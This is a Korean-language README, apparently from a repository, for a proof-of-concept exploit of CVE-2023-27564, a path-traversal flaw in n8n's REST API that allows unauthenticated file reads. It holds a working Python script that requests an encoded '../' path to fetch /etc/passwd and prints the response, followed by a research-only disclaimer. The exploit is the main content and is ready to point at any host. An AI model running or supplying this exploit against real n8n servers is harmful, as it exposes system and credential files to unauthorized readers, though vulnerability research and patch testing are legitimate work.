
REST API의 경로 탐색을 통해 n8n에서 익명 파일 읽기를 가능하게 하는 CVE-2023-27564용 개념 증명 익스플로잇입니다. 보안 연구 및 취약점 평가를 위해 설계되었습니다.
이 취약점은 n8n에서 익명 파일 읽기를 허용합니다.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
이 저장소에 제공된 개념 증명(PoC)은 교육 및 보안 연구 목적으로만 제공됩니다. 정보와 코드는 사이버 보안 전문가와 연구자가 소프트웨어 및 시스템의 취약점을 이해하고 보호하기 위해 사용되어야 합니다. 사전 상호 동의 없이 대상을 공격하기 위해 이 PoC, 관련 정보 또는 코드를 사용하는 것은 불법이며 엄격히 금지됩니다.
이 PoC를 사용함으로써, 귀하는 이 PoC가 시연하는 취약점의 잠재적 영향을 이해하고 있으며 이를 책임감 있고 윤리적으로 사용할 것에 동의합니다. 이 PoC의 저자는 이 자료의 오용이나 제공된 정보 및 코드 사용으로 인해 발생할 수 있는 모든 손해에 대한 책임을 부인합니다. 최종 사용자는 모든 관련 지역, 주, 국가 및 국제 법률을 준수할 책임이 있습니다.
저자는 이 저장소에 제공된 정보의 정확성과 신뢰성을 보장하기 위해 최선을 다했습니다. 그러나 정보는 어떠한 종류의 보증 없이 "있는 그대로" 제공됩니다. 저자는 포함된 정보의 정확성, 내용, 완전성, 법적 적합성 또는 신뢰성에 대한 책임이나 의무를 지지 않습니다.